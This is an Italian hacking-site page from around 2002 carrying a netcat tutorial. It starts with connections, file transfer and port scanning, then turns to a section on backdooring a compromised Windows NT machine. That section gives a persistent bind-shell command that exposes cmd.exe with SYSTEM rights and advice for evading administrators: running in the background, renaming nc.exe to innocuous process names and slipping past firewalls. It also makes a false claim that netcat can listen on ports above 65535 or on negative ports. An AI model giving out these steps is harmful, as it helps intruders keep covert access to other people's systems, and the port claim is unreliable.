Utenti Online:  | IP:  28/10/2002: Aggiornata la grafica del sito, by pCwArE ;))
Documentazione
Tecniche di intrusione
Security FAQ 1.0

Protocollo TCP/IP

Buffer Overflow
DDoS
ICMP
Grande Guida Hacking
Enciclopedia Lord Shinva
Lista Porte
RFC
Linux
Shell
How to become a hacker
Jargon File

 

DISCLAIMER: Si ricorda che il Web Admin del sito ed il provider non si ritengono responsabili in nessun modo del cattivo utilizzo che chiunque dovesse fare di tutto il materiale contenuto nel sito. Lo scopo della Security Check Community è quello di condividere ed approfondire le conoscenze della comunità.

 

Votaci!!

Hacking/Documentazione/Linux
GUIDA INTRODUTTIVA A NETCAT
***************************************************************
GUIDA ALL'UTILIZZO DI NETCAT
Autore: -=|Nephilim|=-
E-mail: stocastica@katamail.com
guida scaricata da: http://www.napolihak.it
***************************************************************

INDICE


----|--DISCLAIMER
|
|--BREVE INTRODUZIONE
|
|--CHE COSA E'?
|
|--COME STABILIRE UNA CONNESSIONE?
|
|--COME INVIARE DEI FILE?
|
|--COME UTILIZZO NC PER FARE DEL BUON PORT-SCANNING?
|
|--TABELLA DEI COMANDI
|
|--APPLICAZIONI: SHELL E SHELL CAMOUFLAGE
|
|--CRYPTCAT...E QUESTO COSE'?
|
|--TNX

*********************************
DISCLAIMER *
*********************************

Questa mini guida sull'utilizzo di NetCat è da considerarsi come un testo informativo/educativo. Non sono un Guru, sono 
un essere umano e potrei scrivere cazzate, quindi se ho sbagliato qualcosa scrivetemi pure e correggerò l'errore 
(...magari senza insultarmi... :-) ). L'autore (Nephilim) non si assume alcuna responsabilità per l'uso inadeguato o 
illegale delle informazioni qui contenute. Ho realizzato questa guida per far capire alcuni aspetti della sicurezza non 
per far divertire un paio di lamer.
Insomma se vi fate beccare per queste menate sono tutti cazzi vostri. :-)

***********************************
BREVE INTRODUZIONE *
***********************************

Questo breve tutorial riguarda l'utilizzo di un programma che riveste sicuramente un ruolo molto importante nei processi 
di scambio dati e collegamento tra sistemi. In esso saranno presenti alcune informazioni tratte dal readme dello stesso 
Hobbit (il creatore di Netcat). Ricordo che Netcat esiste sia in versione UNIX che in Windows.

*******************************
CHE COSA E'? *
*******************************

Netcat è un programma in grado di leggere e scrivere dati attraverso le connessioni TCP e UDP.

Le sue principali potenzialità sono:

Connessioni I/O TCP o UDP, per e da qualsiasi porta. 
DNS forward/reverse checking. 
Capacità di port-scanning, con randomizer.
Capacità di source-routing.
Slow-send mode, ovvero invio di una linea ogni N secondi.
Possibilità di legarsi ad un'altro programma per fargli sfruttare la connessione. <---MOLTO UTILE 
Script backends.
File transfers.
Server testing.
Firewall testing. 
Proxy gatewaying.
Network performance testing.
Address spoofing tests.

Come avete potuto notare le potenzialità sono molte e vedremo come sfruttarne almeno una parte.

************************************
COME STABILIRE UNA CONNESSIONE? *
************************************

Poniamo di voler mettere in comunicazione due sistemi. Le operazioni da svolgere sono molto semplici. Sul server basta 
scrivere il seguente comando (prima farò degli esempi per poi presentarvi una tabella che semplifichi le cose...):

nc -l -p2702 -d -e cmd.exe -L

Con questo comando diciamo a netcat di entrare in listen mode, sfruttando la porta 2702 e avviando il programma cmd.exe 
non appena la connessione viene attivata. Con -L si comanda inoltre di riavviare netcat con la stessa linea di comando 
quando la connessione termina. (Dopo capirete meglio)

Sul sistema client scriviamo:

nc bersaglio 2702

Con il quale faremo connettere netcat al bersaglio nella sua porta 2702.
Ok, se tutto andra bene avremo a disposizione una console di connessione sul server di destinazione dalla quale potremo 
uscire digitando:

exit

A questo punto la connessione terminerà ma saremo in grado di riconnetterci al server in quanto prima abbiamo digitato 
il comando -L che ha riavviato il listening.

*****************************************
COME INVIARE DEI FILE? *
*****************************************

Semplice...per non dire banale...vi renderete presto conto che NC è altamente versatile ma anche intuitivo e semplice 
da utilizzare. :)

Sul server scriviamo:

nc -l -p 2702 >filename

Sul client che invia il file:

nc bersaglio 2702 <filename

*****************************************************
COME UTILIZZO NC PER FARE DEL BUON PORT-SCANNING? *
*****************************************************

Come ho detto nell'introduzione NC possiede anche la capacità di scanner e anche se NMAP resta sempre il migliore in 
questo settore anche nc è utile e direi anche più semplice. Vediamo come funziona.
Ad esempio:

nc -v -w 2 -z bersaglio 20-40

Netcat proverà a connettersi a tutte le porte dalla 20 alla 40 (incluse) del bersaglio e ci informerà su qualsiasi 
SMTP, FTP o telnet server che incontrerà nel suo scanning. L'opzione -z ci permetterà di affrontare la cosa con molta 
velocità ma se dovesse essere necessario un certo delay nello scanning delle porte l'opzione -i sarà la nostra soluzione.

****************************************************
TABELLA DEI COMANDI *
****************************************************

*************************************************************************************************
* -d * Permette ad NC di lavorare in Background <-----MOOOOLTO UTILE 
*************************************************************************************************
* -e * Esegue il programma seguente. P.S.:Ho notato che funziona solo se NC è stato compilato con il 
* -DGAPING_SECURITY_HOLE 
*************************************************************************************************
* -i * Setta il tempo di delay. 
*************************************************************************************************
* -g * Usato per costruire una loose-source-routed path per la propria connessione. Utile per complicare la vita al 
* traceroute. 
*************************************************************************************************
* -G * Per posizionare l'"hop pointer". 
*************************************************************************************************
* -l * Forza NC ad entrare in listen mode ed aspettare una connessione. 
* * 
* * A questo punto mi viene in mente un'esempio che potrei definire illuminante... :-) 
* * 
* * nc -l -p 2702 <filename 
* * 
* * Con questo comando diremo a netcat di aspettare una connessione sulla porta 2702 e di inviare il file filename
* * non appena la connessione verrà effettuata. 
*************************************************************************************************
* -L * Riavvia NC non appena la connessione termina con la stessa linea di comando. 
*************************************************************************************************
* -n * Forza NC ad accettare solo connessioni da IP numerici. 
*************************************************************************************************
* -o * Per avere un file log di tutte le operazioni. EX: -o logfile 
*************************************************************************************************
* -p * Richiesto per le connessioni outbound. Specifica la porta da utilizzare. 
*************************************************************************************************
* -r * Lo scanning avviene in maniera random. 
*************************************************************************************************
* -s * Utilizzato per specificare indirizzi locali di origine. EX: "-s ip-addr" or "-s nome". 
*************************************************************************************************
* -t * Permette a NC di negoziare con telnet a condizione che sia stato compilato con il parametro -DTELNET. 
* <---INTERESSANTE *
*************************************************************************************************
* -u * Avverte NC di utilizzare una connessione UDP invece che TCP. 
*************************************************************************************************
* -v * Controlla il livello di verbosity (Prolissità del protocollo). 
* * Senza -n netcat farà forward e reverse name/address host lookup, e ci avviserà in caso di problemi di DNS errato.
*************************************************************************************************
* -w * Limita il tempo da impiegare per inizializzare la connessione. 
*************************************************************************************************
* -z * Previene l'invio di dati ad una connessione TCP e limita l'invio nelle UDP. MOLTO utile per uno scanning veloce.
*************************************************************************************************

*****************************************
APPLICAZIONI:SHELL E SHELL CAMOUFLAGE *
*****************************************

Ok, e allora? ...diranno quelli che non hanno un briciolo di fantasia...come allora? provate a pensare al sistema 
operativo più stupido...SI WIN NT...Con Netcat è possibile perfezionare il nostro attacco, vediamo come:

--->Vogliamo una bella shell? Procuriamocela!

Una volta preso il controllo di un server (ma anche del + stupido dei privati) è possibile fare in modo che si avvii 
un batch con questo comando:

nc -l -d -p 23 -t -L -e cmd.exe

Et Voilà! ad ogni connessione al nostro bersaglio avremo una shell spawnata (Bella parola...x i newbies: generata) per 
le nostre connessioni telnet...e tutto in maniera anonima (sempre che prima non abbiate fatto ca**ate! :-) ).
Ricordo che avremo i permessi NT AUTHORITY\SYSTEM.

--->Siamo visbili? 

L'opzione -d permette ad nc di lavorare in background e questo significa che non lo troveremo nemmeno sulla lista delle 
task in esecuzione (premendo CTRL+ALT+CANC, per intenderci) per una buona mimetizzazione. Nonostante questo 
l'invisibilità non esiste e se qualcuno verificasse le porte vedrebbe la connessione...
ma anche a questo c'è una soluzione...he he...:-)

--->C'è un firewall? Aggiriamolo!

Come ho detto prima netcat permette di aprire QUALSIASI porta..un breve scan delle porte legittimate ad aprirsi 
(perchè no! magari usando ancora netcat) e metteremo in listening la porta desiderata. A quel punto ci connetteremo 
e il gioco sarà fatto.

--->Usiamo la testa!

Chiaramente sarebbe il caso di rinonimare nc.exe al fine di non insospettire il bersaglio. Inoltre netcat viene 
presentato con il codice sorgente e questo significa che è possibile personalizzare NC a propria discrezione 
al fine di renderlo il più possibile aderente alle proprie necessità. Il C è come al solito d'obbligo.

--->Usiamola ancora meglio!

Tutti sappiamo che le porte su cui si può lavorare sono 65535...molte meno persone sanno però che 65535 è un 
numero assegnato dalla IANA e di conseguenza altamente modificabile. Vediamo di capire bene questa cosa: 
Poniamo di essere riusciti ad entrare in un sistema, il nostro Admin (che da questo momento in poi 
chiameremo pippo, Yuk! ) però nota qualcosa di strano o semplicemente fa un controllo...prende il suo bel 
port-scanner ed analizza il sistema...già, ma solo nel range di porte 1-65535! Se io dico a netcat di entrare 
in listening sulla porta 270280 o semplicemente -1 il mio attento NMAP non troverà proprio nulla! Sembra 
strano ma vi assicuro che Netcat lo permette e poi rimarrà in attesa di vostri ordini o connessioni! MITICO!
Ok, pochi entusiami...:)
Non sottovalutiamo gli admin, talvolta sono più furbi di quello che sembrano...poniamo che il nostro pippo sia 
ancora sospettoso e che voglia analizzare tutti i processi in esecuzione. Sarebbe meglio fargli trovare 
quello che si aspetta di trovare e di conseguenza utilizzate nomi credibili come ipscan.exe , iflog.exe , 
spool.exe (evitate nomi come tistofottendolashell.exe...tendono a beccarvi...:-)
Beh, sicuramente non sarà una shell eterna ma vi assicuro che durerà molto ma molto tempo! 


****************************************************
CRYPTCAT...E QUESTO COSE'? *
****************************************************

Ho voluto inserire uno dei diretti discendenti di netcat, Cryptcat appunto, in quanto in termini di sicurezza presenta
un grosso miglioramento. E' stato infatti inserito l'algoritmo di criptazione Twofish di Bruce Schneier. Molto utile 
per lo sniffing del traffico netcat!


****************************************************
TNX *
****************************************************

Ok, anche questa è fatta...vi consiglio di avvicinarvi a questo proggy perchè è veramente utile.
CIAO...
...aspettate...questa volta faccio i saluti: :-)

Melanie (ti adoro), Saso (Se mi passi gli appunti di analogica adorerò anche te), l'allegra ciurmaglia di Napoli Hak 
(Team, Collaboratori, parrucchieri, buttafuori e passanti), Z3liaK, Stormnet, Cyb3r Attack, Subex, SaRiCa, Leila, 
J.Romeno, WW, Onda Quadra, Little Tatu, tutti quelli che mi sono dimenticato di inserire ma soprattutto tutta la 
selvaggia Acid-def Crew. 


We work in the dark
We do what we can
We give what we have
Our doubt is our passion, and our passion is our task
The rest is the madness of art.

-- Henry James



--
-=|Nephilim|=-
Acid-def Crew Member
stocastica@katamail.com

Partner

pCwArE
ZeroDay
Il tuo sito qui..
Il tuo sito qui..
Il tuo sito qui..

>Diventa Partner

Newsletter

A breve la Newsletter!!
Community
Forum
Chat

Statistiche

[contatore visite]

 

TORNA ALLA HOMEPAGE


Security Check™ Designed By http://www.pcware.tk